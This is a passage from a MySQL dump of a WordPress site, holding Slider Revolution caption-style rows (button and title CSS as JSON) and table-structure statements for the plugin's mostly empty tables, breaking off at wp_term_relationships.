":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"50px\",\"line-height\":\"55px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Roboto Slab\\\"\",\"padding\":[\"0\",\"0\",\"10px\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"center\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(97,'.tp-caption.Hero-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(98,'.tp-caption.Video-Title','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"-20%\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(99,'.tp-caption.Video-SubTitle','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"12px\",\"line-height\":\"12px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0.35\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"-20%\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(100,'.tp-caption.NotGeneric-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}'),(101,'.tp-caption.NotGeneric-BigButton','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"27px\",\"30px\",\"27px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.15\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(102,'.tp-caption.WebProduct-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#333333\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"2\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"16px\",\"line-height\":\"48px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0px\",\"40px\",\"0px\",\"40px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#333333\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"2\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}'),(103,'.tp-caption.Restaurant-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffe081\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#0a0a0a\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(104,'.tp-caption.Gym-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#72a800\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power1.easeInOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"13px\",\"35px\",\"13px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#8bc027\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}'),(105,'.tp-caption.Gym-Button-Light','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#72a800\",\"background-transparency\":\"0\",\"border-color\":\"#8bc027\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Power2.easeInOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(106,'.tp-caption.Sports-Button-Light','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"500\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(107,'.tp-caption.Sports-Button-Red','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"500\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#db1c22\",\"background-transparency\":\"1\",\"border-color\":\"#db1c22\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(108,'.tp-caption.Photography-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"Power3.easeOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"13px\",\"35px\",\"13px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}'),(109,'.tp-caption.Newspaper-Button-2','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Linear.easeNone\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}');
/*!40000 ALTER TABLE `wp_revslider_css` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_revslider_layer_animations`
--
DROP TABLE IF EXISTS `wp_revslider_layer_animations`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_layer_animations` (
`id` int(9) NOT NULL AUTO_INCREMENT,
`handle` text NOT NULL,
`params` text NOT NULL,
`settings` text DEFAULT NULL,
UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_revslider_layer_animations`
--
LOCK TABLES `wp_revslider_layer_animations` WRITE;
/*!40000 ALTER TABLE `wp_revslider_layer_animations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_revslider_layer_animations` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_revslider_navigations`
--
DROP TABLE IF EXISTS `wp_revslider_navigations`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_navigations` (
`id` int(9) NOT NULL AUTO_INCREMENT,
`name` varchar(191) NOT NULL,
`handle` varchar(191) NOT NULL,
`css` longtext NOT NULL,
`markup` longtext NOT NULL,
`settings` longtext DEFAULT NULL,
UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_revslider_navigations`
--
LOCK TABLES `wp_revslider_navigations` WRITE;
/*!40000 ALTER TABLE `wp_revslider_navigations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_revslider_navigations` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_revslider_settings`
--
DROP TABLE IF EXISTS `wp_revslider_settings`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_settings` (
`id` int(9) NOT NULL AUTO_INCREMENT,
`general` text NOT NULL,
`params` text NOT NULL,
UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_revslider_settings`
--
LOCK TABLES `wp_revslider_settings` WRITE;
/*!40000 ALTER TABLE `wp_revslider_settings` DISABLE KEYS */;
INSERT INTO `wp_revslider_settings` VALUES (1,'a:0:{}','');
/*!40000 ALTER TABLE `wp_revslider_settings` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_revslider_sliders`
--
DROP TABLE IF EXISTS `wp_revslider_sliders`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_sliders` (
`id` int(9) NOT NULL AUTO_INCREMENT,
`title` tinytext NOT NULL,
`alias` tinytext DEFAULT NULL,
`params` longtext NOT NULL,
`settings` text DEFAULT NULL,
`type` varchar(191) NOT NULL DEFAULT '',
UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_revslider_sliders`
--
LOCK TABLES `wp_revslider_sliders` WRITE;
/*!40000 ALTER TABLE `wp_revslider_sliders` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_revslider_sliders` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_revslider_slides`
--
DROP TABLE IF EXISTS `wp_revslider_slides`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_slides` (
`id` int(9) NOT NULL AUTO_INCREMENT,
`slider_id` int(9) NOT NULL,
`slide_order` int(11) NOT NULL,
`params` longtext NOT NULL,
`layers` longtext NOT NULL,
`settings` text NOT NULL,
UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_revslider_slides`
--
LOCK TABLES `wp_revslider_slides` WRITE;
/*!40000 ALTER TABLE `wp_revslider_slides` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_revslider_slides` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_revslider_static_slides`
--
DROP TABLE IF EXISTS `wp_revslider_static_slides`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_static_slides` (
`id` int(9) NOT NULL AUTO_INCREMENT,
`slider_id` int(9) NOT NULL,
`params` longtext NOT NULL,
`layers` longtext NOT NULL,
`settings` text NOT NULL,
UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_revslider_static_slides`
--
LOCK TABLES `wp_revslider_static_slides` WRITE;
/*!40000 ALTER TABLE `wp_revslider_static_slides` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_revslider_static_slides` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_term_relationships`
--
DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_relationships` (
`object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
